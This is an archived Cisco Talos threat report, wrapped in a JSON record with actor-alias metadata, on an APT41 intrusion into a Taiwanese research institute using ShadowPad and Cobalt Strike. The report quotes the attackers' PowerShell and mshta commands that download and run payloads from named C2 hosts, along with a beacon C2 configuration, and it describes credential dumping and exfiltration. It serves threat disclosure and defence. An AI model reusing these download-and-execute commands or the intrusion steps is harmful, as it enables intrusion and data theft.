{ "id": "3eda53bf-01d4-40dc-9c54-a6cd6e383385", "created_at": "2026-04-06T00:08:27.224301Z", "updated_at": "2026-04-10T03:36:33.835457Z", "deleted_at": null, "sha1_hash": "8c5f458c42dacd87e817aa0fd3fa9583dc27fbfc", "title": "APT41 likely compromised Taiwanese government-affiliated research institute with ShadowPad and Cobalt Strike", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1560501, "plain_text": "APT41 likely compromised Taiwanese government-affiliated\r\nresearch institute with ShadowPad and Cobalt Strike\r\nBy Joey Chen\r\nPublished: 2024-08-01 · Archived: 2026-04-05 14:52:38 UTC\r\nThursday, August 1, 2024 08:00\r\nCisco Talos discovered a malicious campaign that compromised a Taiwanese government-affiliated\r\nresearch institute that started as early as July 2023, delivering the ShadowPad malware, Cobalt Strike and\r\nother customized tools for post-compromise activities.\r\nThe activity conducted on the victim endpoint matches the hacking group APT41, alleged by the U.S.\r\ngovernment to be comprised of Chinese nationals. Talos assesses with medium confidence that the\r\ncombined usage of malware, open-source tools and projects, procedures and post-compromise activity\r\nmatches this group’s usual methods of operation.\r\nThe ShadowPad malware used in the current campaign exploited an outdated vulnerable version of\r\nMicrosoft Office IME binary as a loader to load the customized second-stage loader for launching the\r\npayload.\r\nWe also discovered that APT41 created a tailored loader to inject a proof-of-concept for CVE-2018-0824\r\ndirectly into memory, utilizing a remote code execution vulnerability to achieve local privilege escalation.\r\nTaiwanese Government-Affiliated Research Institute compromised by Chinese\r\nActor\r\nIn August 2023, Cisco Talos detected abnormal PowerShell commands connecting to an IP address to download\r\nand execute PowerShell scripts in the environment of a Taiwanese research institute. The nature of research and\r\nhttps://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/\r\nPage 1 of 12\n\ndevelopment work carried out by the entity makes it a valuable target for threat actors dedicated to obtaining\r\nproprietary and sensitive technologies of interest to them.\r\nChinese Threat Actors likely Behind the Attacks\r\nCisco Talos assesses with medium confidence that this campaign is carried out by APT41, alleged by the U.S.\r\ngovernment to be comprised of Chinese nationals. This assessment is based primarily on overlaps in tactics,\r\ntechniques and procedures (TTPs), infrastructure and malware families used exclusively by Chinese APT groups.\r\nTalos’ analyses of the malware loaders used in this attack reveal that these are ShadowPad loaders. However,\r\nTalos has been unable to retrieve the final ShadowPad payloads used by the attackers.\r\nShadowPad, widely considered the successor of PlugX, is a modular remote access trojan (RAT) only seen sold to\r\nChinese hacking groups. The malware was publicly reported being used by APT41, which is a hacking group\r\nbelieved to be based out of Chengdu, China, according to the U.S. Department of Justice.  Along with APT41 it\r\nhas also been used by other Chinese hacking groups like Mustang Panda and the Tonto Team.\r\nDuring the investigation, we observed a couple TTPs or IoC that were observed in previous reported campaigns,\r\nincluding the following:\r\nThe same second stage loader binary: A second stage loader, that acts as a successor to the initial side-loaded ShadowPad loader, discovered by Talos was also linked to ShadowPad  and previously associated\r\nwith ShadowPad publicly. We have also observed identical loading mechanisms, infection chains and file\r\nnames being utilized in the current attacks with reliable previous open-source reporting.  \r\nInfrastructure overlapping: Beside the binary connection, we also found a C2 (103.56.114[.]69) that was\r\nreported by Symantec. Although the campaign reportedly ran in April 2022, which is more than one year\r\nbefore the campaign we discovered, there were a few similarities between the TTPs observed in the two\r\ncampaigns. This includes using the same ShadowPad Bitdefender loader, using similar file names for the\r\ntool, using Filezilla for moving files between endpoints and using the WebPass tool for dumping\r\ncredentials. \r\nThe employment of Bitdefender executable for sideloading: The malicious actor leverages Bitdefender\r\nwhere it uses an eleven year old executable to sideload the DLL-based ShadowPad loader. This technique\r\nhas been seen in a variety of reports which have been attributed to APT41. This technique has been\r\nreported in multiple reports (Reports: 1, 2, 3, 4).\r\nChinese Speaking Threat Actor\r\nThis attack saw the use of a unique Cobalt Strike loader, written in GoLang is meant to evade detection of Cobalt\r\nStrike by Windows Defender. This loader is based on an anti-AV loader named CS-Avoid-Killing hosted on\r\nGitHub and written in Simplified Chinese. The repository is promoted in multiple Chinese hacking forums and\r\ntechnical tutorial articles.\r\nThe Cobalt Strike loader also consists of file and directory path strings in Simplified Chinese, indicating that the\r\nthreat actors that built/compiled the loader were well-versed in the language.\r\nhttps://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/\r\nPage 2 of 12\n\nThe Github repository of Cobalt Strike loader.\r\nTechnical tutorial article on making anti-AV Cobalt Strike backdoor.\r\nTactic, Technique and Procedure Analysis\r\nIn August 2023, Cisco Talos detected abnormal PowerShell commands connected to an IP address to download\r\nPowerShell script for execution in the environment of the target. We performed an investigation based on our\r\ntelemetry and found the earliest infiltration trace from mid July, 2023. We currently lacked sufficient evidence to\r\nconclusively determine the initial attack vector. The threat actor compromised three hosts in the targeted\r\nenvironment and was able to exfiltrate some documents from the network. \r\nhttps://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/\r\nPage 3 of 12\n\nUpon accessing the network, attackers start to gain a foothold by executing malicious code and binaries on the\r\nmachine. On the machine with the web server, a webshell is installed to enable the threat actor’s ability to perform\r\ndiscovery and execution. The threat actors also dropped malwares including ShadowPad and Cobalt Strike with\r\nthree different approaches: the installed webshell, RDP access and the reverse shell.\r\nWebshell drop\r\nC:/www/un/imjp14k.dll\r\nC:/www/un/service.exe\r\nC:/www/un/imjp14k.dll.dat\r\nRDP drop\r\nC:/Users/[hide]/Desktop/log.dll\r\nC:/Users/[hide]/Desktop/imjp14k.dll\r\nC:/Users/[hide]/Desktop/service.exe\r\nC:/Users/[hide]/Desktop/imjp14k.dll.dat\r\nC:/Users/[hide]/Desktop/log.dll.dat\r\nReverse shell drop\r\nC:/Users/Public/calc.exe\r\nC:/Users/Public/service.exe\r\nC:/Users/Public/imjp14k.dll\r\nC:/Users/Public/imjp14k.dll.dat\r\nC:/Users/Public/log.dll\r\nC:/Users/Public/log.dll.dat\r\nWe noticed that a couple of the ShadowPad components were detected and quarantined by our solution when\r\nbeing dropped. The threat actor  later changed their tactic to  bypass the detection.The first attempt was running\r\nthe following PowerShell commands to launch the PowerShell script for downloading additional scripts\r\n(PowerShell and HTA) to run backdoor in memory.\r\nhttps://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/\r\nPage 4 of 12\n\npowershell IEX (New-Object\r\nSystem.Net.Webclient).DownloadString('http://103.56.114[.]69:8085/p.ps1');test123\"\r\npowershell IEX (New-Object\r\nSystem.Net.Webclient).DownloadString('https://www.nss.com[.]tw/p.ps1');test123\"\r\nmshta https://www.nss.com[.]tw/1.hta\r\npowershell -nop -w hidden \r\n-encodedcommand\r\n“JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFM...\"\r\nHowever, the attempt was again detected and interrupted before the attackers could carry out further actions. Later\r\non, the attackers used another two PowerShell commands to download Cobalt Strike malware from a\r\ncompromised C2 server (www.nss.com[.]tw). The Cobalt Strike malware had been developed using an anti-AV\r\nloader to bypass AV detection and avoid the security product quarantine. The following command was used by the\r\nthreat actor to download anti-AV malware and run the malware in the victim's host machine. A more detailed\r\ndescription about the Cobalt Strike loader can be found in the Malware and Malicious Tools Analysis. \r\npowershell (new-object\r\nSystem.Net.WebClient).DownloadFile('https://www.nss.com[.]tw/calc.exe','C:/users/public/calc.exe');\"\r\npowershell (new-object\r\nSystem.Net.WebClient).DownloadFile('https://www.nss.com[.]tw/calc.exe','C:/users/public/calc2.exe'); \"\r\nDuring the compromise the threat actor attempts to exploit CVE-2018-0824, with a tool called UnmarshalPwn,\r\nwhich we will detail in the sections below. \r\nThe malicious actor is careful, in an attempt to avoid detection, during its activity executes “quser” which, when\r\nusing RDP allows it to see who else is logged on the system. Hence the actor can stop its activity if any other use\r\nis on the system. Cisco Talos also noticed that once the backdoors are deployed the malicious actor will delete the\r\nwebshell and guest account that allowed the initial access.\r\nInformation gathering and exfiltration\r\nWe observed the threat actor harvesting passwords from the compromised environment. The actor uses Mimikatz\r\nto harvest the hashes from the lsass process address space and WebBrowserPassView to get all credentials stored\r\nin the web browsers.\r\nFrom the environment the actor executes several commands including using “net,” “whoami,” “quser,” “ipconfig,”\r\n“netstat,” and “dir” commands to obtain information on user accounts, directory structure, and network\r\nhttps://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/\r\nPage 5 of 12\n\nconfigurations from the compromised systems. In addition, we also observed query to the registry key to get the\r\ncurrent state of software inventory collection on the system with the following command:\r\nC:\\Windows\\system32\\reg.exe query hklm\\software\\microsoft\\windows\\softwareinventorylogging /v\r\ncollectionstate /reg:64\r\nBeside running commands to discover the network, we also observed the ShadowPad sample perform lightweight\r\nnetwork scanning to collect the hosts in the network. The malware tries to discover other machines in the same\r\ncompromised network environment by connecting to the IPs under the same C class sequentially. The connections\r\nwere all sent to port “53781”, with unknown reason. \r\nTo exfiltrate a large number of files from multiple compromised machines, we observed threat actors using 7zip to\r\ncompress and encrypt the files into an archive and later using backdoors to send the archive to the control and\r\ncommand server.\r\nAlthough there is no new backdoor or hacking tools in this attack, we did find some interesting malware loaders.\r\nThe threat actor leverages two major backdoors into their infection chains in this campaign, including both\r\nshadowPad and Cobalt Strike malware. Those two major backdoors were installed via webshell, reverse shell and\r\nRDP by the attacker themselves. In addition, two interesting hacking tools were also found, one is to get local\r\nprivilege escalation and the other is to get web browser credentials. \r\nShadowPad Loader\r\nDuring our investigation of this campaign, we encountered two distinct iterations of ShadowPad. While both\r\niterations utilized the same sideloading technique, they each exploited different vulnerable legitimate binaries to\r\ninitiate the ShadowPad loader.\r\nThe initial variant of the ShadowPad loader had been previously discussed in 2020, and some vendors had\r\nreferred to it as 'ScatterBee'. Its technical structure and the names of its multiple components have remained\r\nconsistent with earlier reports.\r\nThe more recent variant of the ShadowPad loader targeted an outdated and susceptible version of the Microsoft\r\nOffice IME imecmnt.exe binary, which is over 13 years old. Upon execution, this loader examines the current\r\nmodule for a specific byte sequence at offset 0xE367. Successful verification of the checksum prompts the loader\r\nto seek out and decrypt the \"Imjp14k.dll.dat\" payload for injection into the system's memory.\r\nhttps://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/\r\nPage 6 of 12\n\nThe imjp14k loader checksum\r\nFurthermore, we conducted a pivot analysis of this latest loader using VirusTotal and other malware cloud\r\nrepositories. We identified two different loader types, yet both employed the same legitimate binary to launch the\r\nmalware.\r\nG:\\Bee\\Bee6.2(HD)\\Src\\Dll_3F_imjp14k\\Release\\Dll_3F_imjp14k.pdb\r\nG:\\Bee\\Tree\\Src\\Dll_3F_imjp14k\\Release\\Dll.pdb\r\nSecond type of imjp14k loader checksum\r\nCobalt Strike “Anti-AV loader” from Chinese Open Source Project\r\nThere is a Cobalt Strike loader also detected in this incident. With deep analysis for this loader, we found the\r\nloader not only packed with UPX but modified the section name to anti-unpack the malware. There are some\r\ninteresting observations here suggesting that the adversary may be speaking Chinese. The loader was developed\r\nby Go programming language and string in the binary indicates a project name “go版本” which means “go\r\nversion” in mandarin. Based on the project name we found that the code was cloned from a GitHub source that\r\nwas written in simplified Chinese and the project is to avoid the Cobalt Strike being deleted by antivirus products.\r\nEmbedded project name\r\nUpon analyzing the malware and GitHub page we found, we discovered that the attacker might have followed the\r\nGitHub steps to generate this loader and deploy the Cobalt Strike beacon to the victim's environment, the\r\nscreenshots are shown this loader will get an encrypted picture from C2 server and the code logical same as the\r\none on GitHub. \r\nhttps://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/\r\nPage 7 of 12\n\nSource code from github\r\nhttps://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/\r\nPage 8 of 12\n\nMalware from the attack\r\nIt’s important to highlight that this cobalt strike beacon shellcode used steganography to hide in a picture and\r\nexecuted by this loader. In other words, its download, decryption, and execution routines all happen in runtime in\r\nmemory. This Cobalt Strike beacon configuration shown below. \r\n{\"C2Server\": \"http://45.85.76.18:443/yPc1\", \"User Agent\": \"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;\r\nWindows NT 5.1)\\r\\n\"}\r\nhttps://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/\r\nPage 9 of 12\n\nUnmarshal.exe malware decrypts its payload with four stages. The first stage is the executable file which will try\r\nto search [filename].tbin, and inject a first stage decryption payload, inject_loader_1.dll, in an allocated memory\r\nblock. The first stage decryption payload will decompress second stage payload, inject_loader_2.dll, and injection\r\ninto memory, the second stage payload will also try to search *.dlls or ddb.dlls file for next stage payload. If it can\r\nnot find the specific file, it will decrypt the final payload out and inject that payload into another memory block.\r\nAfter deep analysis, we found the final payload is UnmarshalPwn malware which is a POC for CVE-2018-0824\r\nand uses a remote code execution vulnerability to get local privilege escalation. \r\nWith the artifacts we found in this campaign, we pivoted and discovered some samples and infrastructure that\r\nwere likely used by the same threat actors but in different campaigns. Although we don’t have further visibility\r\ninto more details about these campaigns at the moment, we hope that by revealing this information, it would\r\nempower the community to connect the dots and leverage these insights for additional investigations.\r\nWe found 2 other ShadowPad loaders by pivoting the RICH PE header (978ece20137baea2bcb364b160eb9678) of\r\nthe ShadowPad loader. Sharing the same RICH PE header indicates that these binaries share a similar compilation\r\nenvironment.\r\n2e46fcadacfe9e2a63cfc18d95d5870de8b3414462bf14ba9e7c517678f235c9\r\neba3138d0f3d2385b55b08d8886b1018834d194440691d33d612402ba8a11d28\r\nOne of the loaders were observed downloaded from two C2 servers:\r\n103.96.131[.]84\r\n58.64.204[.]145\r\nBeside the ShadowPad loader, we found the same Bitdefender loader\r\n(386eb7aa33c76ce671d6685f79512597f1fab28ea46c8ec7d89e58340081e2bd) and a payload file on the C2 server.\r\nThe ShadowPad payload connects to an interesting C2 domain w2.chatgptsfit[.]com for communication.\r\nCoverage\r\nhttps://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/\r\nPage 10 of 12\n\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.  \r\nClamAV detections are also available for this threat:\r\nWin.Packed.UnmarshalPwn-10019484-0\r\nWin.Packed.CobaltStrike-10019485-0\r\nWin.Loader.UnmarshalPwn-10019486-0\r\nWin.Loader.Shadowpad-10019487-0 \r\nhttps://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/\r\nPage 11 of 12\n\nIOCs \r\nIOCs for this research can also be found at our GitHub repository here.\r\nSource: https://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/\r\nhttps://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/\r\nPage 12 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/" ], "report_names": [ "chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "58db0213-4872-41fe-8a76-a7014d816c73", "created_at": "2023-01-06T13:46:38.61757Z", "updated_at": "2026-04-10T02:00:03.040816Z", "deleted_at": null, "main_name": "Tonto Team", "aliases": [ "G0131", "PLA Unit 65017", "Earth Akhlut", "TAG-74", "CactusPete", "KARMA PANDA", "BRONZE HUNTLEY", "Red Beifang" ], "source_name": "MISPGALAXY:Tonto Team", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "da483338-e479-4d74-a6dd-1fb09343fd07", "created_at": "2022-10-25T15:50:23.698197Z", "updated_at": "2026-04-10T02:00:05.355597Z", "deleted_at": null, "main_name": "Tonto Team", "aliases": [ "Tonto Team", "Earth Akhlut", "BRONZE HUNTLEY", "CactusPete", "Karma Panda" ], "source_name": "MITRE:Tonto Team", "tools": [ "Mimikatz", "Bisonal", "ShadowPad", "LaZagne", "NBTscan", "gsecdump" ], "source_id": "MITRE", "reports": null }, { "id": "b69037ec-2605-4de4-bb32-a20d780a8406", "created_at": "2023-01-06T13:46:38.790766Z", "updated_at": "2026-04-10T02:00:03.101635Z", "deleted_at": null, "main_name": "MUSTANG PANDA", "aliases": [ "Stately Taurus", "LuminousMoth", "TANTALUM", "Twill Typhoon", "TEMP.HEX", "Earth Preta", "Polaris", "BRONZE PRESIDENT", "HoneyMyte", "Red Lich", "TA416" ], "source_name": "MISPGALAXY:MUSTANG PANDA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "17d16126-35d7-4c59-88a5-0b48e755e80f", "created_at": "2025-08-07T02:03:24.622109Z", "updated_at": "2026-04-10T02:00:03.726126Z", "deleted_at": null, "main_name": "BRONZE HUNTLEY", "aliases": [ "CactusPete ", "Earth Akhlut ", "Karma Panda ", "Red Beifang", "Tonto Team" ], "source_name": "Secureworks:BRONZE HUNTLEY", "tools": [ "Bisonal", "RatN", "Royal Road", "ShadowPad" ], "source_id": "Secureworks", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "c39b0fe6-5642-4717-9a05-9e94265e3e3a", "created_at": "2022-10-25T16:07:24.332084Z", "updated_at": "2026-04-10T02:00:04.940672Z", "deleted_at": null, "main_name": "Tonto Team", "aliases": [ "Bronze Huntley", "CactusPete", "Earth Akhlut", "G0131", "HartBeat", "Karma Panda", "LoneRanger", "Operation Bitter Biscuit", "TAG-74", "Tonto Team" ], "source_name": "ETDA:Tonto Team", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "Bioazih", "Bisonal", "CONIME", "Dexbia", "Korlia", "LOLBAS", "LOLBins", "Living off the Land", "Mimikatz", "POISONPLUG.SHADOW", "RoyalRoad", "ShadowPad Winnti", "XShellGhost" ], "source_id": "ETDA", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null }, { "id": "6daadf00-952c-408a-89be-aa490d891743", "created_at": "2025-08-07T02:03:24.654882Z", "updated_at": "2026-04-10T02:00:03.645565Z", "deleted_at": null, "main_name": "BRONZE PRESIDENT", "aliases": [ "Earth Preta ", "HoneyMyte ", "Mustang Panda ", "Red Delta ", "Red Lich ", "Stately Taurus ", "TA416 ", "Temp.Hex ", "Twill Typhoon " ], "source_name": "Secureworks:BRONZE PRESIDENT", "tools": [ "BlueShell", "China Chopper", "Claimloader", "Cobalt Strike", "HIUPAN", "ORat", "PTSOCKET", "PUBLOAD", "PlugX", "RCSession", "TONESHELL", "TinyNote" ], "source_id": "Secureworks", "reports": null }, { "id": "9baa7519-772a-4862-b412-6f0463691b89", "created_at": "2022-10-25T15:50:23.354429Z", "updated_at": "2026-04-10T02:00:05.310361Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Mustang Panda", "TA416", "RedDelta", "BRONZE PRESIDENT", "STATELY TAURUS", "FIREANT", "CAMARO DRAGON", "EARTH PRETA", "HIVE0154", "TWILL TYPHOON", "TANTALUM", "LUMINOUS MOTH", "UNC6384", "TEMP.Hex", "Red Lich" ], "source_name": "MITRE:Mustang Panda", "tools": [ "CANONSTAGER", "STATICPLUGIN", "ShadowPad", "TONESHELL", "Cobalt Strike", "HIUPAN", "Impacket", "SplatCloak", "PAKLOG", "Wevtutil", "AdFind", "CLAIMLOADER", "Mimikatz", "PUBLOAD", "StarProxy", "CorKLOG", "RCSession", "NBTscan", "PoisonIvy", "SplatDropper", "China Chopper", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "2ee03999-5432-4a65-a850-c543b4fefc3d", "created_at": "2022-10-25T16:07:23.882813Z", "updated_at": "2026-04-10T02:00:04.776949Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Bronze President", "Camaro Dragon", "Earth Preta", "G0129", "Hive0154", "HoneyMyte", "Mustang Panda", "Operation SMUGX", "Operation SmugX", "PKPLUG", "Red Lich", "Stately Taurus", "TEMP.Hex", "Twill Typhoon" ], "source_name": "ETDA:Mustang Panda", "tools": [ "9002 RAT", "AdFind", "Agent.dhwf", "Agentemis", "CHINACHOPPER", "China Chopper", "Chymine", "ClaimLoader", "Cobalt Strike", "CobaltStrike", "DCSync", "DOPLUGS", "Darkmoon", "Destroy RAT", "DestroyRAT", "Farseer", "Gen:Trojan.Heur.PT", "HOMEUNIX", "Hdump", "HenBox", "HidraQ", "Hodur", "Homux", "HopperTick", "Hydraq", "Impacket", "Kaba", "Korplug", "LadonGo", "MQsTTang", "McRAT", "MdmBot", "Mimikatz", "NBTscan", "NetSess", "Netview", "Orat", "POISONPLUG.SHADOW", "PUBLOAD", "PVE Find AD Users", "PlugX", "Poison Ivy", "PowerView", "QMAGENT", "RCSession", "RedDelta", "Roarur", "SPIVY", "ShadowPad Winnti", "SinoChopper", "Sogu", "TIGERPLUG", "TONEINS", "TONESHELL", "TVT", "TeamViewer", "Thoper", "TinyNote", "WispRider", "WmiExec", "XShellGhost", "Xamtrav", "Zupdax", "cobeacon", "nbtscan", "nmap", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434107, "ts_updated_at": 1775792193, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/8c5f458c42dacd87e817aa0fd3fa9583dc27fbfc.pdf", "text": "https://archive.orkl.eu/8c5f458c42dacd87e817aa0fd3fa9583dc27fbfc.txt", "img": "https://archive.orkl.eu/8c5f458c42dacd87e817aa0fd3fa9583dc27fbfc.jpg" } }